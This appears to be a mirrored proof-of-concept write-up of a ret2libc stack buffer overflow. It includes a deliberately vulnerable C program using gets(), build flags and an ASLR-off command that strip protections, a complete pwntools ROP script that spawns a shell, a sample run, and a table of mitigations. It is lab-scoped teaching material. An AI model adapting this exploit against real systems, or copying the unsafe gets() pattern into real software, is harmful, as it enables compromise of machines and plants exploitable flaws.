Share
## https://sploitus.com/exploit?id=71D2288B-E10E-59AA-9C66-5B689FFE346C
# Buffer Overflow PoC โ€” ret2libc on x86-64 Linux

## Overview

Demonstrated a classic stack buffer overflow exploiting a vulnerable C program to spawn a shell via ret2libc ROP chain.

**Environment:** Ubuntu x86-64, ASLR disabled, pwntools

---

## Vulnerable Program

```c
// buffer_overflow.c
#include 

void vulnerable() {
    char buf[64];
    gets(buf);  // no bounds check, reads from stdin
}

int main() {
    vulnerable();
    return 0;
}
```

### Compile (mitigations disabled for PoC)

```bash
gcc buffer_overflow.c -o vulnerable \
    -fno-stack-protector \
    -no-pie \
    -z norelro \
    -fcf-protection=none \
    -w
```

### Verify mitigations

```bash
checksec --file=./vulnerable
# Stack:  No canary found
# PIE:    No PIE (0x400000)
# RELRO:  No RELRO
# NX:     NX enabled
```

### Disable ASLR

```bash
echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
```

---

## Stack Layout Analysis

```bash
objdump -d -Mintel ./vulnerable | grep -A 15 ""
```

Key lines:

```asm
sub rsp, 0x50           ; 80 bytes allocated
lea rax, [rbp-0x40]     ; buf starts at rbp-0x40 (64 bytes below rbp)
```

Stack layout:

```
rbp + 0x08  โ† return address   โ”
rbp + 0x00  โ† saved rbp        โ”‚  offset = 64 + 8 = 72 bytes
rbp - 0x40  โ† buf[0]           โ”˜
rbp - 0x50  โ† bottom of frame
```

Padding to reach return address: **72 bytes**

---

## Exploit Strategy โ€” ret2libc ROP Chain

Since NX is enabled (no shellcode on stack), use ROP to call `system("/bin/sh")`:

1. Overflow 72 bytes to reach the return address
2. Overwrite return address with `pop rdi; ret` gadget
3. Place `/bin/sh` address โ€” gadget pops it into `rdi` (first argument)
4. Add bare `ret` gadget for 16-byte stack alignment
5. Place `system()` address โ€” called with `rdi = "/bin/sh"`

```
Stack after overflow:
โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”
โ”‚  A * 72         โ”‚  padding
โ”œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ค
โ”‚  pop_rdi_addr   โ”‚  ret jumps here โ†’ "pop rdi; ret"
โ”œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ค
โ”‚  bin_sh_addr    โ”‚  popped into rdi by gadget
โ”œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ค
โ”‚  ret_addr       โ”‚  stack alignment fix
โ”œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ค
โ”‚  system_addr    โ”‚  system("/bin/sh") called
โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜
```

---

## Exploit Script

```python
# buffer_overflow_exploit.py
from pwn import *

context.arch      = "amd64"
context.log_level = "info"

elf  = ELF("./vulnerable")
libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")

# Launch process and resolve libc base from /proc//maps
p = process("./vulnerable")
libs = p.libs()
libc_path = [k for k in libs.keys() if "libc" in k and ".so" in k][0]
libc.address = libs[libc_path]

# Resolve addresses (offsets + libc base)
rop_libc     = ROP(libc)
pop_rdi_addr = rop_libc.find_gadget(["pop rdi", "ret"])[0]
ret_addr     = rop_libc.find_gadget(["ret"])[0]
bin_sh_addr  = next(libc.search(b"/bin/sh"))
system_addr  = libc.sym["system"]

# Build payload
payload  = b"A" * 72
payload += p64(pop_rdi_addr)  # overwrite return address
payload += p64(bin_sh_addr)   # rdi = "/bin/sh"
payload += p64(ret_addr)      # stack alignment
payload += p64(system_addr)   # system("/bin/sh")

p.sendline(payload)
p.interactive()
```

---

## Result

```
~/dev/exploit$ python3 buffer_overflow_exploit.py 
[*] '/home/balazs/dev/exploit/vulnerable'
    Arch:       amd64-64-little
    RELRO:      No RELRO
    Stack:      No canary found
    NX:         NX enabled
    PIE:        No PIE (0x400000)
    Stripped:   No
[*] '/lib/x86_64-linux-gnu/libc.so.6'
    Arch:       amd64-64-little
    RELRO:      Full RELRO
    Stack:      Canary found
    NX:         NX enabled
    PIE:        PIE enabled
    FORTIFY:    Enabled
    SHSTK:      Enabled
    IBT:        Enabled
[+] Starting local process './vulnerable': pid 11454
libc base: 0x7ffff7c00000
[*] Loaded 111 cached gadgets for '/lib/x86_64-linux-gnu/libc.so.6'
pop rdi: 0x7ffff7d0f78b
ret    : 0x7ffff7c2882f
/bin/sh: 0x7ffff7dcb42f
system : 0x7ffff7c58750
[*] Switching to interactive mode
$ ls
buffer_overflow.c  buffer_overflow_exploit.py  vulnerable

```

Shell spawned successfully.

---

## Mitigations That Would Block This

| Mitigation | Effect |
|---|---|
| Stack canary | Detects overflow before `ret`, aborts |
| PIE | Randomizes binary base, gadget addresses unknown |
| ASLR | Randomizes libc base, need info leak first |
| SHSTK/CET | Shadow stack detects return address tampering |

---

## Tools Used

- [pwntools](https://github.com/Gallopsled/pwntools) โ€” exploit framework (`pip install pwntools`)
- [ROPgadget](https://github.com/JonathanSalwan/ROPgadget) โ€” ROP gadget finder (`pip install ropgadget`)
- `checksec` โ€” binary mitigation checker (bundled with pwntools)
- `objdump` โ€” disassembler for stack layout analysis